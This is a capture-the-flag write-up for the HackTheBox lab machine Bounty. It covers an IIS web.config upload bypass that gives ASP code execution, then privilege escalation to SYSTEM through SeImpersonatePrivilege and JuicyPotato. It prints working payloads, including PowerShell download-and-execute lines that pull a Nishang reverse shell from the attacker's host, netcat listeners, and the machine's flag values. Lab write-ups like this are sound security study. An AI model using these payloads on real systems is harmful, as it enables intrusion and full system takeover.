Post

HackTheBox Bounty

Writeup for HackTheBox Bounty

HackTheBox Bounty

Machine Synopsis

Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches. (Source)

Key exploitation techniques:

  • IIS file upload bypass (ASP web.config execution)
  • Remote Code Execution (RCE) via web shell
  • SeImpersonatePrivilege abuse via JuicyPotato.exe for SYSTEM acc

Enumeration

1
2
3
4
5
6
7
8
$ nmap -sC -sV 10.10.10.93

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5

The scan identified an IIS 7.5 web server on port 80.

website

gobuster was used for directory enumeration.

1
2
3
4
5
$ gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -x php,js,html,txt,aspx
...
/transfer.aspx          (Status: 200) [Size: 941]
/UploadedFiles          (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
...

The /transfer.aspx page was identified as a file upload interface. Initial testing showed it only allowed specific file types (e.g., .png). The /UploadedFiles/ directory was also discovered.

transfer_webpage

Further enumeration (e.g., using Burp Intruder) revealed that .config files were permitted for upload, among others (gif, jpg, png, doc, jpeg, xls, xlsx, docx).

payload_position

payload_options

Research into “web.config bypass upload restrictions” revealed that IIS can be configured to execute .config files as ASP if specific handlers are enabled. A simple ASP payload was used to test this.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

This crafted web.config file was uploaded via /transfer.aspx. Accessing http://10.10.10.93/uploadedfiles/web.config displayed 3, confirming successful ASP code execution.

web_config_result

Exploitation

ASP Web Shell for RCE (merlin)

A PowerShell reverse shell (revshell.ps1) from Nishang was prepared and hosted on a local HTTP server.

1
2
3
4
5
$ cat revshell.ps1        
function Invoke-PowerShellTcp {
    # ... (Nishang's Invoke-PowerShellTcp function) ...
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 1234

A malicious web.config was then crafted to download and execute this PowerShell script.

1
2
3
4
5
6
7
8
9
10
11
$ cat web.config   
...
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
Set shell = CreateObject("WScript.Shell")
Set cmd = shell.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.23:6969/revshell.ps1')")
Set output = cmd.StdOut.Readall()
Response.write(output)
%>
-->

A Python HTTP server was started to host revshell.ps1. A netcat listener was set up.

1
2
3
4
5
6
7
# On attacker, host revshell.ps1
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 (http://0.0.0.0:6969/) ...

# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

The malicious web.config was uploaded via /transfer.aspx. Accessing http://10.10.10.93/uploadedfiles/web.config triggered the reverse shell.

1
2
3
4
5
6
7
8
9
10
# HTTP server log
10.10.10.93 - - [08/Jul/2022 21:45:34] "GET /revshell.ps1 HTTP/1.1" 200 -

# Netcat listener
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin

This granted a reverse shell as bounty\merlin.

Privilege Escalation

SeImpersonatePrivilege Abuse (SYSTEM) via JuicyPotato

Initial system enumeration with systeminfo revealed Windows Server 2008 R2 Datacenter. whoami /priv showed SeImpersonatePrivilege was enabled.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\windows\system32\inetsrv> systeminfo
Host Name:                  BOUNTY
OS Name:                    Microsoft Windows Server 2008 R2 Datacenter
OS Version:                 6.1.7600 N/A Build 7600
...

PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token  Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
...

The SeImpersonatePrivilege is exploitable by tools like JuicyPotato.exe (or its modern successor, PrintSpoofer/RoguePotato for newer Windows versions, but JuicyPotato is appropriate for 2008 R2). JuicyPotato.exe was downloaded locally and hosted on the attacking machine.

1
2
3
4
5
6
# On attacker, download JuicyPotato.exe
$ wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

# On attacker, host JuicyPotato.exe
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 (http://0.0.0.0:6969/) ...

From the merlin shell, JuicyPotato.exe was downloaded to C:\Users\merlin\Desktop\jp.exe.

1
2
PS C:\windows\system32\inetsrv>cd c:\users\merlin\desktop
PS C:\users\merlin\desktop> (new-object net.webclient).downloadfile('http://10.10.14.23:6969/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')

A new PowerShell reverse shell (revshell2.ps1) was prepared and hosted locally.

1
2
3
4
5
6
$ cat revshell2.ps1
...
function Invoke-PowerShellTcp {
    # ... (Nishang's Invoke-PowerShellTcp function) ...
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 9999

An exploit.bat file was created to execute this reverse shell.

1
2
$ cat exploit.bat                         
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.23:6969/revshell2.ps1')

The exploit.bat and revshell2.ps1 files were hosted on the attacking machine. A netcat listener was set up for the new shell.

1
2
3
4
5
6
7
# On attacker, host exploit.bat and revshell2.ps1
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 ([http://0.0.0.0:6969/](http://0.0.0.0:6969/)) ...

# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

From the merlin shell, exploit.bat was downloaded. JuicyPotato.exe was then executed to launch exploit.bat with NT AUTHORITY\SYSTEM privileges.

1
2
3
4
5
6
7
8
PS C:\users\merlin\desktop> (new-object net.webclient).downloadfile('[http://10.10.14.23:6969/exploit.bat](http://10.10.14.23:6969/exploit.bat)', 'C:\Users\merlin\Desktop\exploit.bat')
PS C:\users\merlin\desktop> .\jp.exe -t * -p exploit.bat -l 9696
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9696
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

The netcat listener caught the SYSTEM shell.

1
2
3
4
5
6
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.93] 49177
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system

The user.txt and root.txt flags were retrieved.

1
2
3
4
5
PS C:\Windows\system32> type c:\users\merlin\desktop\user.txt
06831fefdd281c825b6ba52e51ac5a26

PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
d4ad739f4a8199ffea3b1149e40c121f
This post is licensed under CC BY 4.0 by the author.